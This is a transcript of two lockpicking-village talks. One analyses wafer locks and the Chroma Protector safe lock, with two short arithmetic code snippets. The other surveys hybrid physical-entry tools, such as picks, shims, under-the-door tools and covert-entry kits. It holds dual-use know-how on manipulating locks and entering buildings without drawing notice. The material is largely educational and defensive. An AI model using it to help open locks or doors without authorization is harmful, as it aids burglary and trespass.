If you haven't got a clear idea of what a wafer lock is in a normal implementation, then that's exactly what I'm going to take you through. So at the top here we can see six wafers sticking out the top of this core, and this is the lock at rest. If we insert an incorrect key, or if we insert the correct key but not all the way, then what you'll see is that some wafers will stick out of the top and some wafers will stick out of the bottom of the core, and this will prevent rotation. When the correct key is fully inserted, they all line up along the top and bottom edges of the plug, or the core, and they allow rotation of the core. So, excellent. But that's not a high security lock. There are three cuts per position and only six wafers, so that's not a very large number of differs. The core design makes it very easy to tension: you can just bend a piece of wire, insert that, apply a rotational force, and voila, you have tension. And interestingly, with wafer locks you can't just design anti-pick shapes into them in the exact same way that you would with a pin tumbler lock. It's possible to do, but it's a little bit more tricky than for a normal pin tumbler lock. So now that I've shown you an example of a really bad wafer lock, let's revisit the actual principle behind wafer locks, and maybe I can show you a wafer lock that wouldn't be so easy to pick. The main idea here is to approach the design differently. Rather than our cheap, low quality wafer lock, which has a key that applies tension to the core, with the core then applying tension to the wafers and ultimately opening the lock, we can achieve a much, much higher level of security if instead we have the key only act on the wafers and never directly act on the core. So we have a key that aligns the wafers correctly and applies turning force to the wafers, and then the wafers transfer their turning force to the core.
If they're correctly aligned the lock will still work, but it's a lot harder to tension. So to show you what I'm talking about, here's another animation, this one much less well made than the other one. This grey bit in the middle is our key, the beige yellow element is the wafer, the part highlighted in blue is the core, and all around the outside in grey again is the housing. So the way this works, the key is longer on one side than it is on the other, and when we turn it clockwise it makes contact with the wafer on one side first. So in this case it makes contact at the bottom, and that causes the wafer to slide to the left. And the wafer slides to the left until it meets the other side of the key. At which point there's no longer any lateral motion for the wafer; instead it gets jammed in place like that, and the force on it becomes a rotational force. In this case the wafer is correctly aligned, so that rotational force is then transferred to the core, and that results in the core turning. If it weren't correctly aligned, then what would happen instead is that rotational force would be applied to the housing and the core wouldn't move at all. If you want to have a system that works that way, then there are two key requirements that you need to meet. Firstly, as I just mentioned, the wafer has to be aligned correctly, otherwise it's going to apply that rotational force to the housing and nothing will move. And secondly, the key must have at least two points of contact on the wafer, on opposing sides of the wafer. That's the point at which that lateral force is translated into a rotational force. That's something to keep in mind for later when we take a look at some of the more interesting locks. The main implication of this is that the lock becomes ludicrously difficult to tension, because traditionally what you would do is apply tension as the first step in the lock picking process.
And when you do that, at least one of the elements is going to bind in some way, and then you can reach through with some kind of tool and prod on those elements until you find one that's binding. That's the one that you know you need to move, and you can move it until it stops binding, at which point you know you've correctly positioned it. But that's not possible with this, because in this case you're going to have to align one of the wafers correctly first in order to apply tension. And since you can't apply tension before that point, in order to know where to place it you have to guess. So in the example animation that we just looked at, if I go back, there are six possible positions. So that means you would need a tool that has six different ends on it to simulate the key at that point. And what that means is that because only one of those tools will work, the whole lock picking process, and how quickly you can open that lock covertly, is massively extended, because you're going to have to test each of those tools until you find one that works. And on average it would take you three and a half tries. So the amount of time it would take is massively increased, because that's the requirement before you can even begin the lock picking process, compared to other kinds of lock where you can just apply tension and get started straight away. So the main wafer lock that I want to look at is the Chroma Protector. But there were a number of problems with looking at the Chroma Protector at the time that I started thinking about it. I didn't own one, so that made looking at how it worked tricky. And generally, information on it is scarce. Here are the sources that I've found and learnt from. It's worth noting that Graham Pulford, in his book High Security Mechanical Locks, refers to the Chroma Protector as a lever lock. Now, he does this because he categorizes his locks based off the design of the keys.
But I think it would be very misleading to describe the Chroma Protector as anything other than a wafer lock. And if you really want to delve into the details of the Chroma Protector and exactly how it works, Jaco Fargolin's talk is absolutely fantastic and I highly, highly recommend it. So as I was saying, the Chroma Protector is a lock that I didn't have access to. So there was a motivation to make one for myself, so that I could test whether or not it worked in the way that I thought it did, because I'd been thinking about it theoretically for quite a long time. But things don't always translate into practice in the same way. I wanted a prototype that I could play around with and that would prove whether or not it worked in the way I expected it to. The other reason is that when you design a lock, you tend to gain a lot of insight into how that mechanism works and why some of the design features have developed in the way that they have. And so my hope was that since the Chroma Protector is a reasonably complicated lock, in terms of some of the particular security features that are found in it, I might gain some extra insight. So I'd previously designed locks, and the only one that I ever produced was made of 3mm plywood sections cut with a laser cutter. So that's exactly what I wanted to do again with the Chroma Protector, because I had access to a laser cutter and I had access to 3D printers, and so that was the logical step for me. And I couldn't see any reason why the design couldn't work that way. I wanted it to fit the same size as the Chroma Protector that I now have, because if you design with the same constraints as the actual engineers who designed the lock you're taking inspiration from, you'll get a better understanding of why they've made those decisions. If I didn't limit myself in that way, I might miss important details. And finally, I wanted to include all of the different basic possible wafer designs that I had found in patents up until that time.
So if I take you back here, there are some examples, but we'll dig into that in just a little bit. Some of the other requirements that I set for myself were that I wanted it to be springless. And I wanted it to be springless because, A, I couldn't see a good reason why the mechanism needed springs at the time, and B, because springs generally fail first, most safe locks are designed so that they are not dependent on those springs in order to function, because you don't want to have your secure lock inside your secure container fail on you. And also, adding them is a bit of a pain and makes designing the whole lock a little bit harder, especially if I were then to give this design to other people for them to learn from. I wanted it to be as high security as you can possibly get, considering I'm making it out of 3mm plywood. So in terms of non-destructive entry, I didn't want it to be possible to just look at the insides of the wafers through the keyway and from their shapes discern what the bitting on the key needs to be to get that lock open. I also didn't want it to be possible to just push the wafers to their maximum range left and right and measure a difference, because if that differs and has any kind of relationship to the actual lengths of the sides of the wafers, then you can rapidly gain an idea of what the key has to look like. And then I wanted the lock to also be self-scrambling. Self-scrambling is a concept that lots of locks implement, often through having springs, but that's not necessarily required. The idea behind a self-scrambling lock is simply that when you insert the key to open the lock and you turn that key, it aligns all the components in their correct positions.
And if you then close the lock, one of the important things would be to scramble the positions of those components, so that the next person coming along who looks at the lock after you've locked it can't just stick in a small bit of wire, apply a bit of tension, and have the lock pop open. I also didn't want there to be a central wafer position. This was just a minor 'I want to be annoying' feature. If a wafer were correctly positioned dead center, it would be substantially easier to tension off than any of the other designs, because any tool that has equal-length bits on either side would be sufficient to tension it, whereas that's not the case for any other position. So I thought if I could take that out of the equation, that would make the lock just a little bit more secure. And the final problem that I ran into was reliability. This is related to what I was saying about springs earlier, but it's basically the idea that there shouldn't be a possible position that the wafers could get themselves into where you couldn't insert the key into the lock. Unfortunately, that's something I failed on. I couldn't balance making my lock without any springs, having it be self-scrambling, and having there be no possible positions the wafers could get into where the key couldn't be inserted into the lock. That was just beyond my ability as a self-taught engineer to resolve. So, what I came up with. I used a 3D printed key. The lock itself contains seven wafers. The key is tip-stopped, and the key has a very mild profile, so you can't insert it the wrong way, and it will align both at the end and at the neck, or collar, of the key, so that helps with alignment. And it locks itself open. This was the most important thing that I learnt when designing this, when I finally had it in my hands.
You need two points of contact on a wafer in order to rotate it, or in order to tension with it, and that's all well and good in the opening direction. But I found that as soon as I reversed the key, there was no more than one point of contact on any of the wafers, and so the key can't turn the core backwards. And so once you open it, it stays open, which is a little bit unfortunate. But, nevertheless, I'll do my best to make the files available for others to play with. Here are the four basic wafer shapes that I ended up creating, and they all work in the open direction, at least. On the bottom right, we have a full wafer. This is the bog-standard wafer, and most closely resembles what you'd see in other kinds of wafer lock. On the bottom left, we have a half wafer. The idea being that it's missing one half of the surface, so the key can't tension off this wafer in order to drive the core around, but it still needs to align that wafer correctly in order for the lock to open. So that makes it a little bit harder to attack, because this wafer would be much harder to tension off than the full wafer. Up here on the top right, we have a split wafer that doesn't have a limit on it at either end. This basically functions like two half wafers, so you need to align both of them correctly, and there are actually different cuts for each of them. And then lastly, in the top left, we have the limited split wafer, which requires that the key be the correct length in order to drive both these halves together, so that their total length is the same as the core is wide, but they also need to be aligned correctly left to right. And the hope was that that would be particularly difficult to manipulate, and I wanted to see how it bound up when it did. So, my analysis of it. You can't easily decode it, and it does work in the opening direction. It does self-scramble. And it might be non-trivial to destroy if it weren't made of 3mm plywood sections.
But all in all, probably not something you're going to want to use in a safe. Especially not when you could use something like this. So, this is really the inspiration for my design, and I'm not going to claim any greater originality with what I created; I was hoping to just create a simplified version of this. So, I'll give you some basic details about it. It's 68mm across, and it weighs 730g. It is not a small lock. It contains 11 wafers, which, from a brief reading of the key, have at least 7 possible cuts per position. There may be more. In practice, there are probably fewer in lots of positions, because although in theory any of the layers are completely interchangeable, in practice, at least for the ones that I have seen and that Jaco analyzed in his talk, there seem to be certain patterns of wafers where some of them don't actually vary very often in position or cut. So, two things to note about my Chroma Protector. One, it's not made by Chroma. I suspect heavily that it is made by Carl Wittkopp, also known as CAWI, which is a German safe lock manufacturer, presumably under license. And the second detail is that I'm pretty sure that my Chroma Protector is not the latest version of the Chroma Protector. However, this is the same Chroma Protector as Jaco was covering in his talk, and so I feel pretty happy that there's still some benefit in looking at this. So, we'll start by looking at the key, because the key is pretty complicated, and there are a whole bunch of details to pick out. Here are the seven that I've decided to pick out. So, the Chroma Protector has a post: it's basically got a large spike that runs the length of the lock down the center, which helps align the key, but also removes space that you'd want if you were going to design a tool to fit into the keyway and manipulate the wafers.
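For a rough sense of scale, those two numbers from the talk (11 wafers, at least 7 cuts per position) give a theoretical upper bound on key differs. This is my own back-of-the-envelope arithmetic, and as noted above, factory keying patterns would reduce the practical count:

```python
# Theoretical number of key differs if every wafer position really could
# take any of 7 cuts independently: 7 ** 11, i.e. nearly two billion.
cuts_per_position = 7
wafer_count = 11

theoretical_differs = cuts_per_position ** wafer_count
print(theoretical_differs)  # -> 1977326743
```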
It's also got this ramp, and if you design a tool to fit inside the lock that doesn't have this ramp, what you'll find is that one of the wafers has a portion of it that sticks into the keyway, and so you won't be able to insert your tool all the way into the lock unless you simulate this ramp. And interestingly, at least in principle, if you were designing a tool, you'd need to have that ramp on both sides so that you can push the tool in and pull it back out, back past that little ledge on that wafer when that wafer springs back into position. But the problem you're going to run into is that this ramp is the same width as one cut. So if you're designing a tool, what you really want is a tool that allows you to manipulate wafers individually. You don't want to have a tool that's so thick that it's going to manipulate two wafers at a time. That would make it phenomenally difficult to position each one of them individually correctly. So you'd be in a bit of a bind in terms of how to handle this ramp. The last option would be to create a half-height ramp and make your tool a little bit smaller than the total space that you've got. But again, that's not really ideal. Then we've got these angled cuts, which to the best of my knowledge are just there to make key duplication harder, because, as I mentioned way back near the beginning of the talk, key duplication is one of the possible methods of surreptitious entry. So for a high-security lock, you want to make key duplication as difficult as possible. Those angled cuts look like they're about 45 degrees. I haven't measured, but they look like they're about 45 degrees, and they make key duplication much harder. There's also this weird angled cut. If you look closely, you can see that each of the other cuts on the key is horizontal, except this one.
And this one actually cuts across more than one wafer and engages a flexible portion on the corresponding wafer, which I believe is wafer 9 in this particular case. Again, I believe this is for key duplication, because from what Jaco said about Chroma Protectors that he's looked at, it's not been necessary to have that cut on a tool, and that's also definitely the case for my lock. But still, it's another interesting feature that would make duplicating this key very, very tricky. I've got these partial radial cuts, which cut into the bitting of the key, but not all the way through. And again, there's a potential there to make key duplication much harder if they truly need to be cut out in order to allow correct alignment of the wafer. You could probably in most cases get away with this and not worry about it if you were designing a tool to manipulate the wafers, but this is yet another thing to worry about if you were going to try and copy one of these keys. Then we've got what is probably the most interesting feature on the key for me, which is this undercut. And this undercut is a cut that's made so deeply that it cuts into the actual shank of the key. And so when you insert the key, the particular portion of the wafer that engages with this undercut first has to meet this ramp, and so you need this sort of slot on the key. And if it's able to, it'll travel all the way up, and it'll stop when the key is fully seated, in line with the undercut. And then as you turn the key, the undercut will pass through in that position. Now, that doesn't actually mean that you couldn't design a tool that uses the whole shank space, but you could design the undercut to cut so deeply that it even cuts all the way through to the post. And if you did that, the key would have a hole in it, which wouldn't be a big deal for the key because it's solid, and that would only be one tiny weak point that would be relatively well supported.
But if you were going to design a tool and that undercut could be in any position, well, that's a tricky problem to design around, and it would multiply the number of tools that you would reasonably need in order to open this lock. Now, remember, you'd need to line one of those wafers up correctly in order to tension the lock anyway. So you'd need seven different tips on your tool, and you might need several different shafts, and it might not be possible to create those separately and viably. So, assuming you had seven different ends and 11 wafers where that undercut could exist, well, that's 77 different tools that you'd need to bring on a job, of which only one will work. So this hugely exacerbates the problem, and would hugely increase the amount of time it would take to reliably manipulate open one of these locks, even if you did have a tool that could do it. And finally, we have this dimpled cut. Now, Jaco didn't actually have an answer in his talk as to what it's there for. And I should point out, I am not an expert on this lock. That title almost certainly belongs to some German safe mechanic. But I can offer a theory. And that theory is that the fourth wafer in the Chroma Protector handles counter-rotation. The Chroma Protector handles counter-rotation by allowing essentially the full movement of the key, to about 45 degrees, within the lock. And so at any point while you are opening the lock, you can turn the key back basically the whole way, back basically 45 degrees. If you do that, then what you'll find is that the fourth wafer, in this particular case, has its cut made so that it makes contact with both sides of the key simultaneously. And that wafer handles the counter-rotation of the core, which is the missing element in the lock that I created.
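The 77-tool figure above is just the product of the two unknowns, and the same uniform-guessing average from the six-ended-tool example earlier applies here; a small sketch of my own to make the numbers concrete:

```python
# 7 possible tip profiles times 11 possible undercut positions gives 77
# candidate tools, of which only one opens the lock. Trying them in a
# random order takes (n + 1) / 2 attempts on average.
tip_profiles = 7
undercut_positions = 11

candidate_tools = tip_profiles * undercut_positions
average_tries = (candidate_tools + 1) / 2

print(candidate_tools)  # -> 77
print(average_tries)    # -> 39.0

# Sanity check against the six-ended tool mentioned earlier in the talk:
print((6 + 1) / 2)      # -> 3.5 tries on average
```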
However, if you don't have this dimpled cut on the surface of the key, then what happens when you attempt to turn the key backwards in the lock is that you actually make contact with a protrusion on wafer number 9 before the key makes contact on two points with wafer number 4. And so, exactly the same, at least in theory, as with my lock, you'd be trapped in a position where you only have one point of contact with any wafer in the lock. And so you can't easily counter-rotate the lock, because the harder you turn backwards, the harder you force the wafer against the side of the housing, and the greater the frictional forces become. So my theory is that this is another trap when it comes to key duplication, where if you failed to replicate that sufficiently well, what would happen is that even though you may have a key that opens the lock, you then wouldn't be able to remove the key from the lock. And so the key would remain inside the lock and the lock would still be tamper-evident, even though it had been successfully defeated, which is one of the requirements for a high-security lock. So, to move away from the key and back to the lock, let's take a look at the keyway. There is no core that you can tension off. This is a solid plate that's held in with three screws. There is no way to tension the lock directly around the keyway, and in the center you can see the post, which matches the hole in the key. And you can start to see some of the different shapes of the wafers through the keyway. Here it is with that top layer taken off. And so we can see the top layer, layer 11, which is one of those split wafers. And it's the only wafer, or set of wafers, in this lock, the only layer, that isn't actually sprung. And we can kind of see, looking down, the little portion that sticks out that engages with the ramp. And this little slightly curved portion is the portion that engages with the weird angled cut.
And you can sort of see that every single wafer all the way down is very differently shaped. And so, as a result, it's very, very difficult to look at them and try to discern any kind of meaningful pattern in order to decode which position each wafer might need to be placed in to open the lock. Having now covered the basic idea behind the wafers, and without digging too much into how each of them works, there are two wafers that I'm going to draw particular focus to. The first wafer is number seven in my lock, which has a square cut out in one corner of the wafer end. This effectively acts a bit like a false gate does on traditional slide locks, albeit less effectively. And this is one of the reasons why I think false gates, spools and serrations aren't so simple when it comes to wafer locks. For this cut out to have an effect, all the other wafers would first have to be set correctly, and then the core will turn partially and stop, getting caught in this cut out. Sounds like it'd hamper an attacker pretty effectively, right? Except there's no way for the other wafers to counter-rotate the core. The wafer itself supplies no counter-rotation either, because it can't with the notch squared off. And what this means is that an attacker needs only to keep pushing on the wafers until they finally fall into place. They can't lose progress towards getting the lock open; they can only really gain progress. So, that was the boring detail of the two. The other one reveals what I personally think is the Achilles heel of all wafer lock designs: tensioning off the wafers. And yes, I think they're high security, but I still think they have a fundamental problem, and it's a very difficult one to grapple with. And I think that problem is essentially getting the lock to counter-rotate again when you're using those wafers to tension the lock open. I mean, of course I think that, right? Because that's the design feature that I overlooked in my own design, right?
But I then did a lot of thinking about how to solve that problem. So, the animation on the left here is the most obvious and basic approach to solving that problem. You've kind of got this like bow tie or hourglass style cut out. And essentially, any bit on the key, when turned, in this case 45 degrees, will begin to tension the lock. And as long as nothing blocks the key when it's counter rotating, you can counter rotate or make contact with two surfaces again, and they'll counter rotate really smoothly. The only problem with this is this wafer doesn't have the freedom to move at all. And so it'll allow the lock to be tensioned trivially, which undoes the whole point in designing the lock to tension off the wafers in the first place. So, the way they've tried to do this in the Chroma is a little bit more complicated than that. If you take a look at the animation on the right-hand side, this is the exact same animation as the one on the left, just with a little bit more material cut away. It still functions in exactly the same way, but hopefully you can see the similarities between the animation on the right-hand side and wafer number four in my Chroma lock. The only difference between the animation on the right and the actual wafer in my lock is that in the top right-hand corner, they haven't given the same surface to tension off as in the animation. They've got a surface which the key needs to touch and move laterally into the correct position. But when you design the wafer this way, what you'll find is that the prong that sticks out here on the bottom right-hand side obstructs the keyway. And in fact, you might even be able to see this kind of darker portion on it where that surface has kind of been rubbed away a little bit or has become worn. And the reason for that is this is the portion of the wafer that makes contact with the ramp on the key. 
And so the real reason to have the ramp is to allow the key to enter the lock while not having to have this counter-rotation wafer already set in the correct position. Attacking-wise, though, these two surfaces on the key need to engage at the same time. So if you have any tool with equal-length sides and you counter-rotate in the wrong direction deliberately, you will align this wafer correctly. And if you then had some kind of method of identifying how far away the surfaces are that the key would have to make contact with in order to tension it clockwise, then you'd know the correct position of at least one wafer, and you could decode that. And that would allow you to tension the lock. So ultimately, is this lock impossible to breach or manipulate or pick? No, there have been reports of people managing it, at least against some versions of the lock, even if there aren't any recordings on YouTube. But this is also a phenomenally high-security lock. It is hugely drill resistant; it uses a special plate right at the bottom of the keyway to add extra drill resistance on top of the already significant drill resistance of the plates that sit on top of the lock and effectively function as the faceplate. The totally patternless way that most of the inside surfaces of all the wafers have been cut away means that it's incredibly difficult to decode. In a best-case scenario, if you had a huge number of samples, thousands of these locks, then you'd maybe be able to carry out some kind of decoding. In a worst-case scenario, for the attacker at least, what will be happening at the factory is that they truly do something to randomize all of those shapes, and so there will never be a pattern, no matter how many samples you collect. There's no way for us to easily work out which one is the case. But it does seem like it would take a phenomenal amount of resources to work out how to decode one of these locks.
I didn't really discuss the blow ring at all, but that's worth covering. The brass ring that sits around the outer edge of this lock is the blow ring. And from my understanding, the way that it's designed is so that if you pack the middle of the lock through the keyway with explosive (one of the big downsides of keyed safe locks is that you can pack them full of explosive), then when you detonate that explosive to create high pressure to tear the lock apart, rather than the entire lock completely tearing itself to pieces, what happens instead is the blow ring gives way under the high pressure before the lock actually dismantles itself, since the blow ring is a much softer metal than the rest of the body. And so what will happen is you'll end up fusing together all the various wafers in the middle into one horrible blob, and the lock won't be opened. So at that point, the only option would be to completely obliterate the lock. And considering this is normally used in high security containers or vaults and that sort of thing, that means you have to go through the entire surface of that vault or container, which will be no easy feat. And that brings me on to the final point, which is the super, super tight tolerances. So I've attempted to manipulate my lock with the face cover removed, applying direct tension to the core, which obviously is cheating, right? You wouldn't be able to do that if the lock were actually installed in a container. But even doing that, even basically ignoring the main security feature that the lock has, and attempting to manipulate it like that, the tolerances are so incredibly tight that with even more than two or three wafers set, I can't manipulate the lock and have the wafers hold in place even when they bind.
They do bind, and it's possible to detect that with enough force, and it's possible to move them into position, but they drop really, really easily, which makes it phenomenally hard to manipulate. And all in all, I would say this is a phenomenally secure lock, and it largely achieves the goals that high security locks have. And it's a wafer lock. So clearly there is some potential for wafer locks to provide the security that we're looking for in high security locks, in a way that isn't perhaps as inherent to, for example, pin tumbler locks. I can't think of a pin tumbler lock that has a comparable challenge with tensioning or manipulation. So there we go. Hopefully I've convinced you that while lots of wafer locks are low security, the wafer lock principle itself, especially when you have the key tension the wafers, which then tension the core, is actually really, really quite high security, and it's got great potential to deliver a much higher security solution than other types of lock design. So hopefully you learned something. Hopefully I convinced you. And I presume now we will lead into the question and answer section. Thank you very much.
Want to tinker with locks and tools the likes of which you've only seen in movies featuring secret agents, daring heists, or covert entry teams? Then come on by the Lockpick Village, run by The Open Organisation Of Lockpickers, where you will have the opportunity to learn the hands-on how the fundamental hardware of physical security operates and how it can be compromised. The Lockpick Village is a physical security demonstration and participation area. Visitors can learn about the vulnerabilities of various locking devices, techniques used to exploit these vulnerabilities. Experts will be on hand to demonstrate and discuss pick tools, and other devices that are generally available. By exploring the faults and flaws in many popular lock designs, you can not only learn about the fun hobby of sportpicking, but also gain a much stronger knowledge about the best methods and practices for protecting your own property.
10.5446/50746 (DOI)
All right, welcome to my presentation. This is Hybrid Physec Tools: best of both worlds, or just weird? This is part of TOOOL's Lockpick Village for DEF CON 28. My name is Didimus. So I always like to start out with an agenda so we kind of know where we're going with the conversation; as well, if you come back and watch this recording or view these slides, then you can kind of bookmark where different things were. So we're going to start out and talk about what physec tools are and what we use them for, and then the why: why are we looking into the whole hybrid concept, and is there even a need? And then, what about hybrid physec tools: what's already out there, what are some ideas that work, and what don't work? And then we'll get to the how: if this is something that speaks to me, something I'm kind of interested in, how do I start, or what would I do? So with that, we'll launch right into it. A little bit about me. I'm Didimus. I've been picking locks for about 13 years. I picked it up when I was in college; I had a locksmith uncle who taught me a lot of things, and it just went from there. My favorite pick is the Deforest offset, and my least favorite pick is this thing. For my day job, I'm a security engineer for a technology company on their security operations and engineering team, and I'm a lockpick enthusiast. I'm also happily married and a father of four children. All right, launching into it. So what are physec tools? First of all, when I say physec, I mean physical security. I mostly say that because I don't want to have to say 'physical security tools' many times in this presentation. So, if you think about it: any tools that are used to test and/or compromise physical security. I made up this definition, but that's the basic gist of it. So, a few examples of this that you may or may not be familiar with. If you're watching this presentation, you're most likely familiar with them. So things like lockpicks, bypass tools, drivers, jigglers, shims, etc.
are all examples of PhySec tools. A couple of weird examples — not so much weird, maybe just a bit different, things you might not consider physical security tools — are things like multi-tools (your standard Gerber, Leatherman, SOG type things), wedges (these could be aluminum, or the air-compressed wedges), as well as compressed air — the cans that clean your keyboard and computer parts. And then film reel: you can actually use real theater film reel to compromise certain types of doors. Check out Pope Dave; he's got a few videos talking about this as well. Some awesome examples: things like the thumb latch tool. If you don't know what this is, you should definitely check it out. It's a really neat tool, extremely useful, especially with double doors and things like that. And then the under-the-door tool. I don't know a single physical security pen tester who does not have an under-the-door tool. They are a must-have; they make the job very easy and they're very nice to have. And then there's the stuff that works in a pinch. This would be your standard bobby pins, paper clips, safety pins — stuff you find around. You could take a pop bottle, cut it, and then you have something you could shim with. This would be, you know, kind of the MacGyver method, I guess you could say. So let's talk hybrid for a minute. The way I'm interpreting hybrid tools is this: typically there's one tool that's traditionally used to manipulate a lock or bypass a latch or a door or something like that, but a hybrid tool has more than one use, instead of just the one very specific one. I didn't want to use the word multi-tool in this presentation because I didn't want to confuse it with actual multi-tools — your Leathermans, your Gerbers, things like that. Also, I do want to get this disclaimer out right here at the beginning: hybrid doesn't always mean better.
And what I mean by that is, just because it can do two things doesn't mean it can do both of them really well. Years ago I was thinking about getting a motorcycle. I wanted something I could ride and have be street legal, but that I could also take dirt biking in the mountains. I was talking to some of my friends and they said, yeah, you could totally do that — it's going to suck at both of them, though. So it's better to get something more specific. But that's not always the case. Sometimes something that can do two things is still good at both; it just might not do them quite as well. So you kind of have this dichotomy: do you want the super specific, exact tool for this exact situation, or do you compromise and have something that is more versatile — maybe not the exact perfect one you would use, but you're trained on it and you can use it — that do-more-with-less kind of philosophy? When I'm talking about hybrid tools, there's a picture of a couple here: you have a top-of-the-keyway tensioner, as well as a tubular tensioner, and then a comb pick. It's three tools in one; it's small, it's slim, it's compact. Another one is a double-sided pick. There's also creativity — this is kind of a way various people can express their creativity. Someone will like it; there are always trolls, so someone will hate it, but someone will always like it, is what I've discovered. So now we get to the why. Why would you want to do this? Well, it comes back to that "can I do more with less." I like to think of the example where, let's say you're doing a physical engagement and you're going in during business hours. Yeah, after hours, take your full tactical bag and everything, but if you're going in trying to masquerade as an employee, or tailgate, or something like that...
You can't go in with your whole kit. You can't walk in wearing a suit and tie and then have a 5.11 MOLLE tactical backpack with all of your goodies and your go bag and everything in it. So sometimes you need custom tools — a lot of times physical pen testers will actually have custom tools for these types of situations. Again, creativity: this is a great way to express it. I'm not a developer. You come to DEF CON and a lot of people have these brand new zero days and Metasploit modules and things like that. I'm not a programmer, but I like designing things; I'm more of a physical tool kind of person. I like actually creating something you can hold in your hand. Another thing: it could lead to better tools overall, and we're going to have a couple examples of that coming up. Your silly idea might be the tool that locksmiths and locksport enthusiasts have been wanting — you just didn't know it. So, some things that inspire me. I really like spy stuff. I like the James Bond films. I like the International Spy Museum in Washington, DC — I'd recommend you check it out when you can; it's well worth it. I also like the SERE stuff — the Survival, Evasion, Resistance, Escape type stuff. So this first thing here at the top is an actual titanium escape ring. It's got a saw blade inside the ring, and it also functions as a handcuff shim. It's kind of cool — I don't have one myself, but I always thought that would be kind of cool to have. Then in the top right and bottom left, these are two exhibits from the International Spy Museum. One is a jackknife from several years ago, and in the bottom left we have one of the first lockpick pens, where the picks were actually concealed inside the pen body. And then on the bottom right, we have an example of a Gerber multi-tool that someone took and actually added lockpicks to.
So in this person's everyday carry, he had a tensioner and a couple of your go-to lockpicks, and there's an Instructable on that — you can go to Instructables and find it; the link is in the notes as well. So let's talk about an improvement example. I really like Sparrows stuff — they're not sponsoring this or anything like that, but I have a lot of their tools and I do like them. Looking over here on the left, we've got their wafer jigglers, their wafer picks — four of them, they come on a key chain, they're really nice, and they're good at getting into cabinet locks and some simpler locks and things like that. On the bottom left, you have the Mini Jim. This is something I have a couple of, and I really like it. And there in the middle, you have the Sparrows Shank, which is used for decoding, as well as bypassing unshielded padlocks and different things like that. So you take these three — however many — different tools, and they actually have a set called Sparrows Dark Shift; they created an expansion set for them. Here on the right, you have your standard slim jim, but they narrowed the handle down and cut a few holes in it to give it a little lighter weight. Then you look at the next two tools: those are double-sided wafer picks that have the exact same profile as the Sparrows wafers over on the left, but they're double-sided and take up less space. They're very skinny — in fact, I carry these in my wallet. Next, you have a Sparrows Shank that is shorter and has a bit wider handle, so maybe you can palm it better. And then this thing on the end is a hook-rake pick that you can use both for single pin picking and for raking. It's called the Quick Strike, and from what I can tell, you can only get it in the Dark Shift expansion set. I really like it. It's fun.
It's definitely worth looking into if you haven't played around with them before. A couple of things: first, you can use it as a hook or as a rake. And then they added these serrations. Starting with that left one — it's kind of hard to see in this picture, but there are actually very fine serrations. Part of the point of the Dark Shift set was that you could use it with or without gloves on, so having those serrations, especially in the dark, would be extremely valuable. Looking at the serrations on the two double-sided wafer picks, as well as the Mini Jim, you can see those look a lot more pronounced — they actually look a little painful. They're really not that bad, because they're flat on top. I'll be talking about serrations here in a little bit. But that's an example where they took a couple of existing tools and asked: how can we combine them, make them more useful, more versatile, a smaller form factor, that kind of stuff. Another example: this is the TAG 5 Industries Scorpion lockpick set. This is something I acquired a couple of years ago, and you'll notice that it's your standard tension tools as well as your standard picks — however, the handles are very different. Definitely check them out. The reason why is that these were designed by a government covert entry specialist. From what I understand, he worked exclusively for government agencies, designing covert entry tools. Whereas with a standard lockpick you hold it more like you would hold a pencil, these you actually hold kind of like you're holding a handle of some sort. Typically, when you're doing covert entry, you don't want to go up to a door, get down on your knees, and start working on the doorknob. With these, you could actually stand up, hold it a different way, and look way less conspicuous.
This is something he designed for government agencies and the like before making them available to the public. They're really neat. They're different to get used to, but they are really, really nice — I'm a fan of them. And as I mentioned earlier, I'm a fan of the International Spy Museum; they're actually featured in some of the exhibits there. So let's talk about some hybrid tool examples. This is LockNoob. If you don't follow LockNoob on Twitter and on YouTube, I highly recommend it — he puts out great content. He's done a few collaborations; these are just three of them, plus an interesting hybrid multi-tool that he designed. I could go and explain them, but he does a much better job — definitely check out his stuff. Starting at the top left, we have the Gut Wrench. This is a locksmithing tool: when you take apart cylinders and change out the pins and such, at times you would need four or five different tools, and he thought, why don't I just design one that has all of them in one? And I know locksmiths that actually use this, because they have one tool instead of having to rummage all over the workbench to find the right tool for the right cylinder and the right diameter and so on. Moving over to the top right — I kind of think of this one as a locksmith kit in a multi-tool. He designed it in such a way that it has various picks, a knife, a screwdriver (so you could take out the Phillips head screws in things like your standard American padlocks), a place to put tensioners, tweezers, as well as plug followers. Again, these are YouTube videos — check them out; he breaks it down way better than I could. Moving to the bottom right, you have the GOAT Wrench. This is where he took that tensioner I showed earlier — there are some tubular locks it fits in, and there are some that it doesn't.
So he actually did a few prototypes — took some stock steel and designed his own — and once he got the prototypes where he wanted them, he did a collaboration with Sparrows, and you can actually get the GOAT Wrench today. And then finally on the bottom left, we have the Sparrows Medusa. We'll have a closer look here in a second, but the point I want you to notice is that it's a pick you can do single pin picking as well as raking with. All right, and now we get to the "or just plain weird." So remember back in 1999, the James Bond movie The World Is Not Enough? He had to break into someplace, and he had this switchblade-action credit card that he flipped out. I didn't pick locks at the time, but going back and looking at it, it's very interesting — we've got some kind of S-snake rake going on, and then on the backside it's like a multi-ridge raking pick. I don't know; it looked cool for Hollywood. And then here on the right, something more practical from Johnny Depp's rendition of Sherlock Holmes, where he had various try-out lever lock and warded-style picks, which is interesting. So — just weird, or practical, or Hollywood? I don't know, but it is kind of interesting to see this stuff in media. So back to LockNoob for a second. There's a YouTube video where he talked specifically about the Medusa, and I follow roughly the same process he laid out in that video for designing new picks. It starts with sketches: start designing them — here's what I kind of want, here's what I want it to do — because it's a lot easier to make mistakes on pen and paper than on prototypes. So he ran through a couple of different designs, thinking about where he wanted to go with it.
Once you get to that point, you take the one you like and start making your own custom prototypes. You can get some kind of rotary tool and create it yourself, or you can switch over to computer-based modeling like CAD design and go from there. Then you tweak and work with your prototype until you have something you really like — which eventually ended up being the Sparrows Medusa. And of course, laser etching: it's got this really beautiful artwork of the Medusa figure with the snakes and the hair and everything. It's a really beautiful pick, and it's also really functional. When in doubt, laser etching is pretty cool. So, where to begin, if this is something that's kind of interesting to you, or maybe you've thought of a tool or something like that. This is the process I follow. First: what am I trying to solve or improve upon? Start there — start brainstorming. I've found that brainstorming always works best when I'm picking. Then ask yourself what's currently out there — who's already done a lot of the work? Think of Sparrows taking their own designs and then tweaking them and making them better in the Dark Shift expansion. Then you get to the design and drawing phase, then you start doing prototypes and testing, and you repeat that until you're happy with how your prototypes are. And then you move to the production phase. So this is something I did a few years ago, when I came up with this crazy idea: I wanted something sort of like a lockpick wallet card that was more than one-time use. There are some that are good — TOOOL makes a great one I like; once you break it 